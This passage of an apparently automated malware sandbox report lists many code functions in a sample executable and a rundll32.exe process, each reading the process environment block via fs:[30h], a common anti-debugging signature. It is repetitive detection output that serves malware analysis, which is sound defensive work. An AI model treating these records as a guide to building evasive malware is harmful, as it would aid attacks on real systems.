          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACE539 mov eax, dword ptr fs:[00000030h]1_2_00ACE539
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8D34 mov eax, dword ptr fs:[00000030h]1_2_00AD8D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A8A537 mov eax, dword ptr fs:[00000030h]1_2_00A8A537
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]1_2_00A2C577
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]1_2_00A2C577
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A43D43 mov eax, dword ptr fs:[00000030h]1_2_00A43D43
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A83540 mov eax, dword ptr fs:[00000030h]1_2_00A83540
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AB3D40 mov eax, dword ptr fs:[00000030h]1_2_00AB3D40
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A27D50 mov eax, dword ptr fs:[00000030h]1_2_00A27D50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A846A7 mov eax, dword ptr fs:[00000030h]1_2_00A846A7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FE87 mov eax, dword ptr fs:[00000030h]1_2_00A9FE87
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A316E0 mov ecx, dword ptr fs:[00000030h]1_2_00A316E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A176E2 mov eax, dword ptr fs:[00000030h]1_2_00A176E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A48EC7 mov eax, dword ptr fs:[00000030h]1_2_00A48EC7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]1_2_00ABFEC0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A336CC mov eax, dword ptr fs:[00000030h]1_2_00A336CC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]1_2_00AD8ED6
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0E620 mov eax, dword ptr fs:[00000030h]1_2_00A0E620
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABFE3F mov eax, dword ptr fs:[00000030h]1_2_00ABFE3F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A38E00 mov eax, dword ptr fs:[00000030h]1_2_00A38E00
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1608 mov eax, dword ptr fs:[00000030h]1_2_00AC1608
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]1_2_00A3A61C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]1_2_00A3A61C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1766D mov eax, dword ptr fs:[00000030h]1_2_00A1766D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]1_2_00ACAE44
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]1_2_00ACAE44
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A18794 mov eax, dword ptr fs:[00000030h]1_2_00A18794
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A437F5 mov eax, dword ptr fs:[00000030h]1_2_00A437F5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]1_2_00A04F2E
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]1_2_00A04F2E
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3E730 mov eax, dword ptr fs:[00000030h]1_2_00A3E730
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]1_2_00AD070D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]1_2_00AD070D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]1_2_00A3A70E
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]1_2_00A3A70E
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2F716 mov eax, dword ptr fs:[00000030h]1_2_00A2F716
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]1_2_00A9FF10
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]1_2_00A9FF10
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1FF60 mov eax, dword ptr fs:[00000030h]1_2_00A1FF60
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8F6A mov eax, dword ptr fs:[00000030h]1_2_00AD8F6A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1EF40 mov eax, dword ptr fs:[00000030h]1_2_00A1EF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462746D mov eax, dword ptr fs:[00000030h]6_2_0462746D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A44B mov eax, dword ptr fs:[00000030h]6_2_0463A44B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h]6_2_0469C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h]6_2_0469C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463BC2C mov eax, dword ptr fs:[00000030h]6_2_0463BC2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]6_2_046D740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]6_2_046D740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]6_2_046D740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]6_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]6_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]6_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]6_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C14FB mov eax, dword ptr fs:[00000030h]6_2_046C14FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]6_2_04686CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]6_2_04686CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]6_2_04686CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8CD6 mov eax, dword ptr fs:[00000030h]6_2_046D8CD6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461849B mov eax, dword ptr fs:[00000030h]6_2_0461849B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h]6_2_0462C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h]6_2_0462C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04643D43 mov eax, dword ptr fs:[00000030h]6_2_04643D43
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04683540 mov eax, dword ptr fs:[00000030h]6_2_04683540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04627D50 mov eax, dword ptr fs:[00000030h]6_2_04627D50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460AD30 mov eax, dword ptr fs:[00000030h]6_2_0460AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CE539 mov eax, dword ptr fs:[00000030h]6_2_046CE539
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]6_2_04634D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]6_2_04634D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]6_2_04634D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8D34 mov eax, dword ptr fs:[00000030h]6_2_046D8D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0468A537 mov eax, dword ptr fs:[00000030h]6_2_0468A537
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h]6_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h]6_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]6_2_046CFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]6_2_046CFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]6_2_046CFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]6_2_046CFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046B8DF1 mov eax, dword ptr fs:[00000030h]6_2_046B8DF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]6_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]6_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]6_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov ecx, dword ptr fs:[00000030h]6_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]6_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]6_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D05AC mov eax, dword ptr fs:[00000030h]6_2_046D05AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D05AC mov eax, dword ptr fs:[00000030h]6_2_046D05AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046335A1 mov eax, dword ptr fs:[00000030h]6_2_046335A1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h]6_2_04631DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h]6_2_04631DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h]6_2_04631DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]6_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]6_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]6_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]6_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]6_2_04602D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]6_2_04602D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]6_2_04602D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]6_2_04602D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]6_2_04602D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463FD9B mov eax, dword ptr fs:[00000030h]6_2_0463FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463FD9B mov eax, dword ptr fs:[00000030h]6_2_0463FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461766D mov eax, dword ptr fs:[00000030h]6_2_0461766D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]6_2_0462AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]6_2_0462AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]6_2_0462AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]6_2_0462AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]6_2_0462AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]6_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]6_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]6_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]6_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]6_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]6_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CAE44 mov eax, dword ptr fs:[00000030h]6_2_046CAE44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CAE44 mov eax, dword ptr fs:[00000030h]6_2_046CAE44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460E620 mov eax, dword ptr fs:[00000030h]6_2_0460E620
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046BFE3F mov eax, dword ptr fs:[00000030h]6_2_046BFE3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h]6_2_0460C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h]6_2_0460C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h]6_2_0460C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04638E00 mov eax, dword ptr fs:[00000030h]6_2_04638E00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1608 mov eax, dword ptr fs:[00000030h]6_2_046C1608
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A61C mov eax, dword ptr fs:[00000030h]6_2_0463A61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A61C mov eax, dword ptr fs:[00000030h]6_2_0463A61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046316E0 mov ecx, dword ptr fs:[00000030h]6_2_046316E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046176E2 mov eax, dword ptr fs:[00000030h]6_2_046176E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04648EC7 mov eax, dword ptr fs:[00000030h]6_2_04648EC7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046BFEC0 mov eax, dword ptr fs:[00000030h]6_2_046BFEC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046336CC mov eax, dword ptr fs:[00000030h]6_2_046336CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8ED6 mov eax, dword ptr fs:[00000030h]6_2_046D8ED6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h]6_2_046D0EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h]6_2_046D0EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h]6_2_046D0EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046846A7 mov eax, dword ptr fs:[00000030h]6_2_046846A7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469FE87 mov eax, dword ptr fs:[00000030h]6_2_0469FE87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461FF60 mov eax, dword ptr fs:[00000030h]6_2_0461FF60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8F6A mov eax, dword ptr fs:[00000030h]6_2_046D8F6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461EF40 mov eax, dword ptr fs:[00000030h]6_2_0461EF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04604F2E mov eax, dword ptr fs:[00000030h]6_2_04604F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04604F2E mov eax, dword ptr fs:[00000030h]6_2_04604F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463E730 mov eax, dword ptr fs:[00000030h]6_2_0463E730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D070D mov eax, dword ptr fs:[00000030h]6_2_046D070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D070D mov eax, dword ptr fs:[00000030h]6_2_046D070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A70E mov eax, dword ptr fs:[00000030h]6_2_0463A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A70E mov eax, dword ptr fs:[00000030h]6_2_0463A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462F716 mov eax, dword ptr fs:[00000030h]6_2_0462F716
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469FF10 mov eax, dword ptr fs:[00000030h]6_2_0469FF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469FF10 mov eax, dword ptr fs:[00000030h]6_2_0469FF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046437F5 mov eax, dword ptr fs:[00000030h]6_2_046437F5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04618794 mov eax, dword ptr fs:[00000030h]6_2_04618794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687794 mov eax, dword ptr fs:[00000030h]6_2_04687794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687794 mov eax, dword ptr fs:[00000030h]6_2_04687794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687794 mov eax, dword ptr fs:[00000030h]6_2_04687794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D1074 mov eax, dword ptr fs:[00000030h]6_2_046D1074
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C2073 mov eax, dword ptr fs:[00000030h]6_2_046C2073
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04620050 mov eax, dword ptr fs:[00000030h]6_2_04620050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04620050 mov eax, dword ptr fs:[00000030h]6_2_04620050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]6_2_0461B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]6_2_0461B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]6_2_0461B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]6_2_0461B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]6_2_0463002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]6_2_0463002D
